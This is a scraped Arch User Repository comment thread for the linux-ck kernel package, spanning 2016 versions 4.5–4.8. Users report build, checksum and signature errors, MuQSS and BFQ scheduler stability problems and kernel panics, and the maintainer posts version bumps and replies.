- It's the holidays people travel... seems to get this this pretty consistently this time of year. First of all, thank you for being very on top of all updates. If I may suggest 2 improvements: - You can build multiple packages in a single PKGBUILD. Because linux-ck and linux-ck-headers are likely to be installed together, may I suggest merging both packages to a single package. Building multiple packages in the same PKGBUILD is something that, for example, clion does.. Effectively, it is setting pkgname= to a space separated list. - Could you split out the config? Each time I do a git pull, I need to open up PKGBUILD, and edit the parameters. By having a separate configuration file, I can setup git to ignore that file (with assume-unchanged), which saves me from having to set the parameters over and over. There is a problem with GPG signature verification ==> Validating source files with sha256sums... linux-4.8.tar.xz ... Passed linux-4.8.tar.sign ... Skipped patch-4.8.14.xz ... Passed patch-4.8.14.sign ... Skipped patch-4.8-ck8.xz ... Passed enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz ... Passed config.x86_64 ... Passed config ... Passed 99-linux.hook ... Passed linux.preset ... Passed change-default-console-loglevel.patch ... Passed net_handle_no_dst_on_skb_in_icmp6_send.patch ... Passed ==> Verifying source file signatures with gpg... linux-4.8.tar ... FAILED (error during signature verification) patch-4.8.14 ... FAILED (error during signature verification) ==> ERROR: One or more PGP signatures could not be verified! The mainline kernel does include the msr module, as does basically every kernel in the main and AUR repos (including this one). If you enable nconfig for this kernel, you can see under "Processor Type and Features -> /dev/cpu/*/msr - Model-specific register support" that msr is indeed enabled as kernel module. Perhaps your device does not support msr? (I have an old Intel Atom machine that I use as a micro server that does not support msr and thus does not support i7z, which I would have liked to have been able to use) Update to linux-ck-core2 4.8.9-1/2 from repo broke my system. Boot fails because my grub configuration (which used to work up to 4.8.6) searches for /boot/vmlinuz-linux-ck, while with 4.8.9 I got /boot/vmlinuz-linux-ck-core2. Fixing it in the grub command line the boot fails again complaining that /lib/modules/4.8.9-2-ck-core2/modules.devname is missing, while the file itself is present. The boot media is an ext4 ssd. Should I update something in my system configuration or is the linux-ck-core2 package broken? - Yes, linux-ck is shipping 99-linux.hook since 4.8.8-2. I posted in the bug report you referenced asking if the hook needs a unique name. Right now linux-ck shares the name with linux which might be a problem. We can make the change if needed. Thank you for bring this to my attention. @QD - No sure what you mean. You mention errors but provide no output and you mention references but provide no line numbers. Finally, you mention larger scope that PKGBUILD but provide no examples... I can't really act on anything you're reporting. If the references to the vanilla kernel are some variables in the PKGBUILD or linux.{preset,install} make sure you inspect them in a shell as many are substitutions that simply don't get substituted. For example, PKGBUILD line 262. QuartzDragon commented on 2016-11-19 05:48 Hey graysky, I was looking at the PKGBUILD, due to build errors, and there are many references that only apply to the vanilla Arch Linux kernel. And it's not just the PKGBUILD that needs fixing... justing letting you know. Cheers, QD The mainline kernel has some interesting changes with 4.8.8-2 and above. I'm not sure if these should be integrated into the ck kernel, but I would say it's worth a look (mainly some sed cleanups and using a new trigger to generate the initramfs as a post-transaction hook): graysky commented on 2016-11-15 20:07 Bump to v4.8.8-1 Changelog: Commit: rob77 commented on 2016-11-15 09:53 @QuartzDragon didn't think of that as I have git cloned this packages URL, I just git pull and re build the package. I did build the package so my comment was an FYI for anyone else facing same issue. But when next update comes will delete the file I have locally and re download. QuartzDragon commented on 2016-11-15 07:59 @rob77 Try deleting the file so it can be redownloaded? I did that just in case. rob77 commented on 2016-11-15 00:25 sha256 check failed on enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz had to amend line 74 of PKGBUILD to pass the error to cf0f984ebfbb8ca8ffee1a12fd791437064b9ebe0712d6f813fd5681d4840791. Alternatively double check the sha256sum by running sha256sum enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz Suggestions for your most recent PKGBUILD: --- a/PKGBUILD +++ b/PKGBUILD @@ -118,7 +118,7 @@ # this as the default choice for it leads to more throughput and power # savings as well. # - # + # sed -i -e 's/^CONFIG_HZ_300=y/# CONFIG_HZ_300 is not set/' \ -i -e 's/^# CONFIG_HZ_100 is not set/CONFIG_HZ_100=y/' \ -i -e 's/^CONFIG_HZ=300/CONFIG_HZ=100/' .config @@ -149,7 +149,7 @@ # modprobe configs zcat /proc/config.gz > ./.config else - warning "You kernel was not compiled with IKCONFIG_PROC!" + warning "Your kernel was not compiled with IKCONFIG_PROC!" warning "You cannot read the current config!" warning "Aborting!" exit WFV commented on 2016-11-05 00:55 4.8.5-3 and 4.8.6-1 ck-piledriver, Virtualbox guests sluggish to the point unable to use them (and WinXP guest blue-screens @ launch). Problem isn't present in stock kernel 4.8.6-1, all guests function normal. (Asus M5A88-M, FX8350 AM3+). No other host problems noticed in either ck rev. EDIT: problem persists in 4.8.6-2 ck-piledriver. Does it have to do with MuQSS and CGROUPS shared real time (for virtualbox)? - This sort of report is not very useful without a comparison back to the ARCH kernel of the same version at a minimum. As always, make sure that whatever you're experiencing is reproducible and not present on the non-ck kernel of the same version and report to CK's blog. I'm getting this msg in journallog with the latest version: BFQ WARNING:last 4611686022722355494 budget 13835058059577131310 jiffies 4294967598 diff 4611686018427387904 @Saren - Correct: dual socket users will need to build from the AUR since NUMA is disabled by default (recommended by CK). @QuartzD - Yes, it would be... I currently build 20 different package sets for [repo-ck] and toggling this on/off would double that to 40 and only serve to confuse users. After all, what percentage of [repo-ck] users have a dual socket motherboard? @SuperIce and @QuartzD - Yes, corrected in 4.8.5-3. I was one of the persons who had issues with NUMA on an AMD FX 8100. About 6 months ago I changed to i7 6700 and disabled NUMA. No issues so far. I did had btrfs corruption with linux-ck early MuQSS versions (v110 I think) so I was a late adopter but now running pretty stable for days. I think the NUMA issue were related to AM3+ socket. mlc commented on 2016-10-27 04:28 I'm running linux-ck with NUMA disabled since about two weeks. I haven't yet experienced any problems with my Skylake CPU. graysky commented on 2016-10-26 21:16 @QD - It's a small increase using a make endpoint in my experience (see the flyspray I note in the PKGBUILD comments). It could be that other endpoints reveal more substantial gains as well. In any case, NUMA is really for servers with multiple sockets; it has no point on a single socket motherboard is my understanding. Linux-ck had it disabled for a long time until some combination of upstream/BFS + NUMA disabled was believed to be responsible for problems which is when I disabled the code to disable it. Now that MuQSS has replaced BFS, this may not be the case any more. Several users have posted to the AUR reporting stability with it disabled as is my experience as well. QuartzDragon commented on 2016-10-26 20:50 How much of a speed increase does disabling NUMA actually give, anyway? I've never really felt the difference. graysky commented on 2016-10-26 19:17 Greg just tagged 4.8.5-rc1 and has it scheduled to release on Friday/noon UTC[1]. We can give disabling NUMA a whirl in 4.8.5-1 if there are no reports linking this setting to bad behavior with MuQSS (I am not experiencing anything bad on my Haswell). 1. metaphorex0 commented on 2016-10-26 10:45 I've been running linux-ck with NUMA disabled since you added that option back to PKGBUILD. I've had 0 issues so far. graysky commented on 2016-10-25 15:49 I can but I would like to get some additional feedback from others who build with NUMA disabled since it caused problems in the past. I too have it disabled on my workstation without ill effects. Can other AUR users please comment. If you have NUMA disabled, are you running a stable 4.8.4-4? @mono - the difference between AUR and [repo-ck] right now is that AUR uses 4.8.4-3 which has ck3 (MuQSS) whereas [repo-ck] uses 4.8.4-1 with ck1 (bfs). I have a dual core system that black screened on booting with ck3 last I checked but there are two patches in 'pending' that I need to try first. I think if they fix that problem, I will go ahead and build 4.8.4-3 for [repo-ck] but I won't be able to test until tomorrow. monotykamary commented on 2016-10-23 16:12 There's a bug that completely freezes my computer when opening or playing OpenGL games for a period of time (with NVIDIA), from the linux-ck-ivybridge package group. The AUR linux-ck package doesn't have that bug, but now specifically crashes osu! on wine everytime upon load (or a few seconds after load). I haven't seen it crash on any other native or wine application so far. --- WINEARCH=win32 WINEPREFIX=~/.wineprefixes/.osu winetricks -q dotnet46 cjkfonts gdiplus wininet winhttp osu! folder size: 3.9G Installed Packages: linux-ck, linux-ck-headers, nvidia-ck, broadcom-wl-ck BFQ and MuQSS enabled; bug also occurs with I/O scheduler CFQ. CPU: Intel Core i5-3317U CPU @ 1.7GHz GPU: GeForce GT 640M LE kogone commented on 2016-10-23 00:34 everything is been stable on ivybridge. have built every update so far! hard to keep up =P graysky commented on 2016-10-22 23:59 Bump to v4.8.4-3 Changelog: Added two key pending patches from CK. Commit: Notes: I suspect CK will ready a ck4 patchset and continue to hold on pushing MuQSS to [repo-ck] a little longer. AUR users are encouraged to test and communicate via CK's blog results as MuQSS matures. graysky commented on 2016-10-22 19:51 Bump to v4.8.4-2 Changelog: Fix EXTRAVERSION variable. Commit: Notes: I would like to get some feedback from AUR users around the stability with the MuQSS before I go building [repo-ck] packages with 4.8-ck3. Please test and report back good or bad. graysky commented on 2016-10-22 19:48 @blitz - Thanks for the reminder... accidentally deleted that code. blitz commented on 2016-10-22 19:11 linux-4.8 ck patchset introduced new versioning schema: patch-4.8-ck3 diff --git a/Makefile b/Makefile +CKVERSION = -ck3 +CKNAME = MuQSS Powered +EXTRAVERSION := $(EXTRAVERSION)$(CKVERSION) From kernel version '4.8' patch '4' extraversion '1' this schema translates into 4.8.4-1-ck3-ck To keep both ck3 and ck is extraneous and not nesessary, imho. # set extraversion to pkgrel # remove ckX version msg "Setting kernel extra version" sed -ri -e "s|^(EXTRAVERSION =).*|\1 -${pkgrel}|" \ -e "s|^(EXTRAVERSION :=).*|\1 -${pkgrel}|" Makefile No issues here with MuQSS on my piledriver. on 4.8.4-1 I am trying out some advanced amdgpu package, which checks for a specific config. Would it be much effort to include it, so that this check does not fail? Kernel 4.8.4-1-ck3-ck not supported CONFIG_DRM_AMDGPU_CIK is missing graysky commented on 2016-10-22 11:24 Bump to v4.8.4-1 Changelog: Commit: Notes: I would like to get some feedback from AUR users around the stability with the MuQSS before I go building [repo-ck] packages with 4.8-ck3. Please test and report back good or bad. Bump to v4.8.3-3 Changelog: Included 4.8-ck3 which uses MuQSS v0.115. Commit: Notes: I would like to get some feedback from AUR users around the stability with the MuQSS before I go building [repo-ck] packages with 4.8-ck3. Please test and report back good or bad. vishwin commented on 2016-10-22 03:21 -ck3 just released, includes MuQSS v0.115 graysky commented on 2016-10-21 19:22 Bump to v4.8.3-2 Changelog: Included 4.8-ck2 which uses MuQSS v0.114. Commit: Notes: I would like to get some feedback from AUR users around the stability with the MuQSS before I go building [repo-ck] packages with 4.8-ck2. Please test and report back good or bad. graysky commented on 2016-10-21 13:21 Please post these details to ck's blog so he can assist. xevrem commented on 2016-10-21 12:17 I'm experiencing a kernel panic shortly after boot. Currently I am using the linux-ck-piledriver kernel. from journalctl -k -b -1: Oct 21 07:03:49 vanir kernel: AMD-Vi: Completion-Wait loop timed out Oct 21 07:03:49 vanir kernel: AMD-Vi: Event logged [IOTLB_INV_TIMEOUT device=07:00.0 address=0x000000040cfa2380] Oct 21 07:03:49 vanir kernel: AMD-Vi: Completion-Wait loop timed out in this log its complaining about device 07:00.0, but its complained about other devices as well that work perfectly fine in other kernels... I would do a dump of those dmesg logs if i could, but it appears journalctl didnt capture anything from those boot cycles... only that one and it never catchs the kernel stack trace dump >_< here is info about my CPU from /proc/cpuinfo if that helps: processor : 0 vendor_id : AuthenticAMD cpu family : 21 model : 101 model name : AMD FX-9800P RADEON R7, 12 COMPUTE CORES 4C+8G stepping : 1 microcode : 0x6006113 cpu MHz : 1400.000 cache size : 1024 KB physical id : 0 siblings : 4 core id : 0 cpu cores : 2 apicid : 16 acc_power nopl nonstop_tsc extd_apicid aperfmperf eagerfpu_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 tce nodeid_msr tbm topoext perfctr_core perfctr_nb bpext ptsc mwaitx cpb hw_pstate vmmcall fsgsbase bmi1 avx2 smep bmi2 xsaveopt arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold avic overflow_recov bugs : fxsave_leak sysret_ss_attrs null_seg bogomips : 5392.44 TLB size : 1536 4K pages clflush size : 64 cache_alignment : 64 address sizes : 48 bits physical, 48 bits virtual power management: ts ttp tm 100mhzsteps hwpstate cpb eff_freq_ro acc_power [13] It should be said, i do not experience these issues with stock kernel nor the zen kernel. I've also tried the generic linux-ck kernel and experience similar issues... Any suggestions or additional info i can grab for you that would help, just let me know :) Taijian commented on 2016-10-21 11:46 I have a question regarding some modules I am missing when I try to compile the kernel locally. These modules also fail to load with the repo-ck 4.8.3 kernel. The 4.7.6 kernel from repo-ck still had them. Specifically, I have a Dell Inspiron laptop, so I am using i8kutils to get my temp-sensors and my fan to work. According to modprobed-db, this is pulling in the following modules: - dell_laptop - dell_smbios - dell_smm_hwmon - dell_wmi However, when trying to build the kernel, these modules are missing/nowhere to be found. Can anybody help point me in the right direction, where I can pull these in from? ooo commented on 2016-10-21 10:56 @graysky, Fair enough. Altough The pending/ patches for bfs512 aren't really 'development' patches, but fixes to bugs that were discovered after bfs512/ck1 release. My understanding is that ck simply didn't want to make a new release, but still recommends adding the fixes. Since some people seem to be having issues with bfs512, it would make sense to me to apply those. I have no problems myself, but I guess anyone having issues with linux-ck-4.8* should try if adding the pending bfs512 patches helps. nTia89 commented on 2016-10-21 10:09 @SuperIce97 I posted here just to advice other users... graysky commented on 2016-10-21 09:41 @ooo - I don't want to include pending patches without CK specifically asking since this is not a development package. You are free to modify the PKGBUILD on your own of course. @eduardoeae - I saw the release but am a bit reluctant to bump and push to [repo-ck] since a few reports to the blog you linked indicate issues still. Perhaps the AUR can have it but I will hold off on publishing to the repo initially. with muqss on, no problem if no muqss.? snack commented on 2016-10-20 07:38 It seems that virtualbox-ck-host-modules-core2 (and possibly other virtualbox-ck-host-modules packages) in repo have been built with a wrong dependency from linux-ck-core2 version since pacman says: $ sudo pacman -Su :: Starting full system upgrade... resolving dependencies... looking for conflicting packages... error: failed to prepare transaction (could not satisfy dependencies) :: virtualbox-ck-host-modules-core2: installing linux-ck-core2 (4.8.2-1) breaks dependency 'linux-ck-core2<4.8' @agm28011997 - CK has stuff in his pending queue beyond MuQSS108 but I don't want to add continually add these since the rate of development of MuQSS is as rapid as it has been. Once MuQSS finalized and replaces BFS, this package will be here applying it. those nvme patches are listed on the archwiki for fixing an issue with powersaving with nvme disks. I'm just trying to figure out if I should add those patches to the pkgbuild when I pick up an nvme drive in a couple weeks. I'll at least test to see if there are any incompatibility issues. If they work without issue, should they get added into the ck repo till reaching mainline? graysky commented on 2016-10-07 00:07 @jwhickman - Dunno about NUMA. Have to ask some users to test and verify that it is or is not a problem. Anyone willing to test? Also, I don't think MuQSS is stable at this point. We'll probably have BFS until the 4.9 release if I read CK's blog correctly. In either case, the linux-ck brand is here to stay; MuQSS will still have the ck1 brand as I understand it. jwhickman commented on 2016-10-06 12:52 Thanks @graysky! I modified this to build MQS for k4.8; no problems besides having to comment out the BFQ patches due to a compile failure, not unsurprisingly. I was hoping the k4.7 BFQ patches would work on k4.8, since the patches applied without issue. :) Question for you; is the 'NUMA disable issue' still relevant, as it's been around a long time, plus now this is MQS. Also, I noticed in my k4.8 build, the config showed a new tick rate of 250 Hz, so was also curious about that. /======================================================= # Running with a 1000 HZ tick rate (vs the ARCH 300) is reported to solve the issues with the bfs/linux 3.1x and suspend. [...] _1k_HZ_ticks=y ### Do not disable NUMA until CK figures out why doing so causes panics for some users! [...] #_NUMAdisable= =======================================================/ In commented original discussion on the tick rate, ck has said, "(16 September 2013 at 18:55) If it still needs 1000Hz to work correctly, then there is still a bug." Anyway, thanks again! @vishwin - Sorry, but not out of date until BFQ for 4.8 is released. I do not see MuQSS104 that patches against the 4.7 code-base (although CK is working on 105 as we speak)... plus, 4.8-ARCH is probably still in the works as it hasn't been build nor hit [testing] just yet. artafinde commented on 2016-10-03 13:45 I actually won't be enabling this unless it turns out to be stable enough and give something to the <= 8 CPUs. I've enabled it on my laptop and screwed up the BTRFS ctree. Seems like I'm reformatting today. I can't really blame MuQSS since there's a big WARNING on top, but it's a warning to users here. Could be something else but all started after I compiled and booted the MuQSS enabled kernel. The combination was: CPU Haswell, BTRFS single metadata SSD 1 device, BFQ enabled by default, localmodules enabled and MuQSS. kogone commented on 2016-10-03 13:40 maybe we should create a rubric of tests to run to see the difference of muqss running on cpus with <= 8 cores? artafinde commented on 2016-10-02 09:26 According to the blog post CK mentions only CPU not cores. I'm not entirely sure how the runqueues are defined (per CPU or per Core) but my understanding from the post is to target servers and make the BFS more comparable to mainline CFS. zerophase commented on 2016-10-02 09:05 @artafinde Does MuQSS benefit more than 1 cpu die, or multiple cores? Say 8+? artafinde commented on 2016-10-02 08:58 MuQSS is really targeting multi CPUs. As per the comment from CK "it will make a difference in 16+ CPUs and with high loads". I suppose we can still use it for testing purposes but unlikely we will produce any lockups to help surface any bugs with the desktop/laptop PCs. 103 is out btw. Well, I'm using makepkg. I have a local directory on which I do a git pull every time there is an update. But, I am doing makepkg -C. Maybe I should try cleaning up the previous source manually before building. Currently, it DOES do two builds. It finishes building linux-ck, and then proceeds with unpacking linux-ck-headers and compiling that. It does warn about the PKGBUILD being a split package. When using yaourt, it does built twice, but I guess that is to be expected. I think you got it wrong. What @Rainmaker said is when we build linux-ck and linux-ck-headers packages, the kernel will be compiled twice, which is unnecessary and waste of time and power. When we build linux-ck-headers, linux-ck will be also compiled and provided. We can just accept installing both packages instead of linux-ck-headers only when pacman prompt us. 4.7.3-5 (linux-ck-headers-4.7.3-5 w/ linux-ck-piledriver-4.7.3-5) fail to boot for me- it just freezes partway through so I had to go back to 4.7.3-4. I have an AMD 9590 CPU. I compiled linux-ck 4.7.3-5 from AUR last night with native optimizations as set in nconfig. I still got kernel panic when I was playing games inside VM. I am using 4.7.1-1 for now and see if crashes still occur. EDIT: Crashes seem to no longer occur at least for now after 3 hours consecutive VM gaming. zerophase commented on 2016-09-15 08:49 @agm28011997 Odd, I'm not getting any freezes with Haswell-e that I believe are caused by the kernel. I just freeze when I have CLion, and a Windows vm up. (I give that up to changing the CLion vm options for parsing a large CMake file) I'm pretty sure I didn't use up all of my ram or swap. Maybe, it is the kernel. evilpot commented on 2016-09-15 08:06 its crashing all over the place... agm28011997 commented on 2016-09-14 17:04 incredible man, I don't know what is it the difference or what have the new code but in my i5 4690 haswell with intel hd graphics from git all is perfect with one hour of gaming now and any freeze, it is something weird because it is supposed to be here yet the freezes @gravysky thanks for your work, both of you, I wish I could help more than testing packages, when you put the new version in the repo I will test for report the issues, but I think that the freezes will continue due to the other comment in the page.. @saren what is BTW? I have seen the journalctl with the hour of freezes and nothing.. the freeze make my computer to do nothing and repeat 2 last seconds of music more or less and the mosue to not move and the keyboard the same graysky commented on 2016-09-13 19:40 Bump to v4.7.3-5 Changelog: update to ck4/bfs497 and reenable CONFIG_CGROUP_SCHED. Commit: Note: I am waiting to hear back from CK before I build the repo packages since he may suggest disabling CONFIG_CGROUP_SCHED. I like to think that the Arch community plays a large role in helping CK to refine bfs so AUR users please continue provide feedback to ck's blog as usual: Saren commented on 2016-09-13 19:38 @agm28011997 Haswell-EP is the xeon version of Haswell cpus, linux-ck-haswell should be 100% compatible with it. I am downgrading once again from 4.7.2-2 to 4.7.2-1 because of your comment. :/ BTW, can confirm the lockup is kernel panic. agm28011997 commented on 2016-09-13 19:30 @saren what is haswell-EP? my freezes starts at 4.7.2-2 with the bfs 472 patch, and other thing, post your problem in the ck blogspot of con kolivas @th3voic3 other like you it is me, if you want you can downgrade the version to 4.7.2-1 with patch bfs472 that is very stable for me @gravysky try to use cgroups enable if you want because for haswell desktop users there are too loockups for use this kernel, we'll wait until a solution Saren commented on 2016-09-13 19:24 Haswell-EP user here, using linux-ck-haswell. Getting 3 random lockups already since 4.7.3. 2 of the lockups in the GPU Passthrough gaming, and the remaining one happened while watching youtube videos. I am downgrading to 4.7.2 as suggested by the comments and see if the issue will be going away. th3voic3 commented on 2016-09-13 19:09 I'm using a Haswell cpu and a qemu vm with PCI passthrough. With the recent kernels my entire host would lockup as soon as I shutdown my VM. I just compiled the kernel with the new patch version and enabled CONFIG_CGROUP_SCHED. Just had a lockup again. Although I had lockups with or without CONFIG_CGROUP_SCHED. Haven't tested this patch yet with the option disabled. For now I'm using the mainline kernel. No issues there. I'm on a SandyBridge machine and using the SandyBridge package from the repo. I ended up having the same complete system freezes as well as KP on shutdown/reboot even after updating to 4.7.3-4 As of yesterday evening I rolled back to 4.7.2-1 and I seem to be stable again. agm28011997 commented on 2016-09-12 12:44 CONFIG_CGROUP_PIDS=y CONFIG_CGROUP_FREEZER=y what means this lines with cgroups disabled?? agm28011997 commented on 2016-09-12 11:52 @gravysky after a few tests I have yet freeze problems while gaming browsing etc.. something wird because is a problem that affects haswell desktops only .. based on read forums and ck blog, I tried to use generic package of linux ck in the repotoo, but it has freezes too @pnehem @graysky I've recompiled the kernel without CONFIG_CGROUP_SCHED as well (GCC 6.2.1), and for me, it DOES seem to solve the persistent kernel oops. I'll try to test it more than just poking it with a stick, meanwhile, you can use this config patch (I know it's like sixty lines with context, shut up): QuartzDragon commented on 2016-09-10 00:43 I've disabled CONFIG_CGROUP_SCHED and am rebuilding to see if the problem persists. bacondropped commented on 2016-09-09 23:28 @pnehem It seems to happen around the same time to me as well, specifically during Xorg launch sequence (I'm running KDE on Manjaro, so to me, it happens during/after the Plymouth splash). Another person reported an oops with a stack trace that looks almost like mine (sans maybe two entries in the middle): Does your stack trace look like the one in that gist? I'm currently rebuilding the kernel with GCC 5.4.0 instead of 6.2.1 to eliminate the toolchain, I'll let you know how that goes. UPDATE: @graysky Do you think disabling cgroups might be worth considering? CK writes they're unstable and are known to cause problems/panics: UPDATE: rebuilding with GCC 5.4.0 does NOT fix the problem (reminder, here's the problem I'm trying to fix, bug report not mine, but very similar stack trace:) pnehem commented on 2016-09-09 20:34 Hello, I'm getting a kernel panic as well, but I was trying to figure out if it where it was happening at because I can get to my login screen, just fine. But when I go to log in then it kernel panics and locks up the computer. I was just getting ready to start reading logs. --update: I updated my system but still getting a seg fault/kernel panic. I get to the login/sddm screen just fine, But the I try to go farther the screen goes black and I can see the cursor and nothing responds locks up the whole system sort of -I can do ctl-alt-F2 and login from the "command line" but I can't make heads or tails of the logs. agm28011997 commented on 2016-09-09 17:51 @gravisky con kollivas has commented that you use the patch of cgroups but he told too that it is unstable yet, I don't think the problem is this but can someone that have my problem try to recompile the kernel without this patch for seeing if the problem is fixed? other thing the people that have my problem has c states in bios enabled? it is an idea.. agm28011997 commented on 2016-09-09 14:19 @gravysky what changes have you put in the kernel ck betwin the 4.7.2-1 and 4.7.2-2 with bfs 480? I revert to older kernel and I have no problems with freezes with cpufreq and pstate, but I am the only person that appear to have this problem, cgroups patch is enabled in the repo? agm28011997 commented on 2016-09-09 14:11 @QuartzDragon kernel opps? What do you mean? agm28011997 commented on 2016-09-09 12:57 I don't know why but I changed the p_state to cpufreq and the freezes continues here.., I used the pstate powersave and the powersave cpufreq and nothint both of them and I think the rest too give me random freezes, for ram? for memory? for cache? I don't know.. I think the config.x86_64 got copied over with config (which is i386)? Looking at the diffs, this does not seem correct and is specifying 32 bit version? -CONFIG_64BIT=y -CONFIG_X86_64=y +# CONFIG_64BIT is not set +CONFIG_X86_32=y I test the latest kernel and for the moment I only had one freeze since I update.. I am not sure if the problem is the memory, but I don't think so with 8 GB and swap of 6GB the only thing is that a I have the tmp files mount in ram but.. not sure.. before, the pc not freezes.. zerophase commented on 2016-09-08 00:04 @agm28011997 I just run out of memory if I'm doing things with Unreal. It's because I don't have enough swap space. (going to fix that once I get an NVME ssd, and just use my old ssd for swap) I set my cpu to performance mode, so I don't encounter issues with frequencies changing. someone with haswell desktop p-state driver and the lastest kernel of ck with freeze problems? i am getting freezes all time with that kernel, the older for me don't make me this and in other laptop with amd cpu it didn't do this too Regarding enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz. GCC 6 Series target specific improvements for Intel Skylake -march=skylake-avx512 and AMD Zen (family 17h) processors -march=znver1 and -mtune=znver1 is now available. :: New Targets and Target Specific Improvements If that's true (the lack of support for SMT_NICE) you will need to patch the source prior to building or email CK to ask him to include it in the ck1 patchset as I think your hardware is in the minority of users. I don't want to just apply a patch that without CK's blessing particularly when the code doesn't help 99% of the users :) Well, they are certainly in the sources: % grep CONFIG_SMT config.x86_64 CONFIG_SMT_NICE=y % grep CONFIG_SMT config CONFIG_SMT_NICE=y And in the [repo-ck] packages but I can't control what you do to the PKGBUILD on your own machine :p % uname -r 4.7.1-1-ck % zgrep CONFIG_SMT /proc/config.gz CONFIG_SMT_NICE=y - Regarding configs without CONFIG_SMT_NICE set? Linux-ck and the Arch kernel both have this set. I don't want to add a conditional in the PKGBUILD that inspects $srcdir/linux-$pkgver/.config and patches if so for example. enihcam commented on 2016-08-16 23:08 graysky commented on 2016-08-16 19:36 Bump to v4.7.0-1 LinuxChanges: Commit: graysky commented on 2016-08-16 13:31 Is this in CK's pending set? Can you get him to articulate a timeline to implement into the next bfs? If the code is not tested enough for example, and if he feels more time and testing is needed, I do not want to push unstable code to the aur and by analogy to the 4000+ users of [repo-ck]. enihcam commented on 2016-08-16 06:19 @SuperIce97 @graysky The issue exists in bfs code. The following patch fixes it. --- linux-4.7.orig/kernel/sched/bfs.c +++ linux-4.7/kernel/sched/bfs.c @@ -1418,6 +1418,9 @@ static void try_preempt(struct task_stru * a different CPU set. This means waking tasks are * treated differently to rescheduling tasks. */ +#ifndef CONFIG_SMT_NICE + cpu = cpu_of(highest_prio_rq); +#endif set_task_cpu(p, cpu); resched_curr(highest_prio_rq); } SuperIce97 commented on 2016-08-15 23:50 @enihcam I haven't had any issues with it, and 4.7 is what the mainline Arch kernel is at right now. Do you have issues with the default arch kernel now? If you do, report it to the arch bug tracker so they can try to get it fixed The panics are almost certainly BFQv8 related. Reverting to BFQv7r11 makes them go away. I was able to get good panic output by logging to the serial port. I'm not a linux-ck user, rather a standalone BFQ user. I've started a thread on paolo's newsgroup to work through this issue: Because of these stability issues, I'd recommend linux-ck revert to BFQv7r11. - That is the default for the PKGBUILD except for _BFQ_enable_=y (and NUMA code has been commented for ages now). The only diff you have is enabling BFQ by default but that shouldn't trigger a bug as you activated it through other means before. Yes, I only installed one disk (/dev/sda) and and enabled BFQ on it. Several hours ago, I checked it with cake-pc# cat /sys/block/sda/queue/scheduler noop deadline cfq [bfq] I am sorry that I did not try recompiling `linux-ck=4.6.5` with `_1k_HZ_ticks=`. I just changed `grub.cfg` and rebooted with the stock kernel ... Everything seems to be working fine ... I am wondering what is going on when the system freezes. So if you require any other information, please let me know. I'm getting patching errors (likely) during prepare() execution which result in makepkg build failure. It's happening at -ck patchset applying, and I have completely no idea what's causing it - maybe these patches are outdated, maybe it's just 4.6.5-incompatible (although I don't think so as errors happen in bfq.c/bfq.h files, for example). Right now my best guess is that the fourth BFQ patch is causing that, because that makes sense - it might be okay a while ago, but now its name in PKGBUILD is useless as it's wrong; I've changed it as @herraiz suggested and, well, everything's okay except patching X) Does anybody else experience this issue as well? EDIT: After a little research I've found out (I hope so) that the thing responsible for that problem is... Yup, the -ck patchset itself. Ta-daa!asky, yes: pacaur. Should I run makepkg manually? I want to note that I have been using pacaur previously to install and update linux-ck without any problems. EDIT: Running it manually right now using "makepkg -fsic". EDIT 2: Well that worked. That's the first time an AUR helper bit me, especially pacaur which is supposed to be very reliable (). Sorry about this. graysky commented on 2016-07-28 00:56 Are you using an aur helper? cryzed commented on 2016-07-28 00:36 When updating to the latest version, I get the following error after the seemingly successful compilation process: > ==> Finished making: linux-ck 4.6.5-2 (Do 28. Jul 02:33:40 CEST 2016) > ==> Cleaning up... > :: Installing linux-ck,linux-ck-headers package(s)... > :: linux-ck,linux-ck-headers package(s) failed to install. Check .SRCINFO for mismatching data with PKGBUILD. The .SRCINFO looks like this:. I did the following modifications to the PKGBUILD: > _1k_HZ_ticks= > _BFQ_enable_=y I don't use the sleep/suspend feature, hence the first change. My /etc/makepkg.conf has the following modifications: > MAKEFLAGS="-j$(nproc)" @Tjuh - Yes, that is likely your problem. I highly recommend using modprobed-db if you want to make localmodconfig for this purpose. Just know that it's only as good as your database and if you want to have a new module that you haven't used before, you will have to boot into a kernel that actually has this module available for modprobed-db to learn that you have an interest. Hope that makes sense. See the wiki for more. - Dunno why, it's in the config and it loads on my system running 4.5.5-ck-1 % zgrep -i zram /proc/config.gz CONFIG_ZRAM=m CONFIG_ZRAM_LZ4_COMPRESS=y Have you perhaps not rebooted since updating to 4.5.5? So I've tried to compile this atleast a dozen times, but it fails everytime at applying a patch; ... ==> Patching source with ck1 including BFS v0.469 patching file arch/powerpc/platforms/cell/spufs/sched.c The next patch would create the file Documentation/scheduler/sched-BFS.txt, which already exists! Skipping patch. 1 out of 1 hunk ignored/sysctl.c patching file lib/Kconfig.debug patching file include/linux/jiffies.h patching file drivers/cpufreq/cpufreq.c patching file drivers/cpufreq/cpufreq_ondemand.c The next patch would create the file kernel/sched/bfs.c, which already exists! Skipping patch. 1 out of 1 hunk ignored patching file include/uapi/linux/sched/x86/Kconfig Hunk #2 succeeded at 1294 (offset 1 line). Hunk #3 succeeded at 1314 (offset 1 line). Hunk #4 succeeded at 2012 (offset 1 line). Hunk #5 succeeded at 2041 (offset 1 line). patching file include/linux/sched/prio.h patching file drivers/cpufreq/intel_pstate.c patching file kernel/sched/idle.c patching file kernel/time/posix-cpu-timers.c patching file kernel/trace/trace_selftest.c patching file kernel/Kconfig.preempt patching file kernel/Kconfig.hz patching file Makefile ==> ERROR: A failure occurred in prepare(). Aborting... ... @QuartzDragon - Yes, Paolo told me as much in a private email but I don't want to force all the repo users to be guinea pigs since the 4.5 series of BFQ should be released very shortly per Paolo. @kyak - No problem, thanks for pointing that out. @francoism - No testing is needed, it's just that adding support required tweaks to the entire set of packages (ie adding conflicts arrays) the skylake packages will be included in the next build (either 4.4.8 or 4.5.2 or whenever Paolo releases BFQ for 4.5.x - whichever comes first). francoism90 commented on 2016-04-19 18:01 Hi graysky, Thanks for providing Linux-ck, really like the BFQ scheduler and also like the easy tweaking/customizing. :) Sorry if this is already ask before, but if testing is needed for the 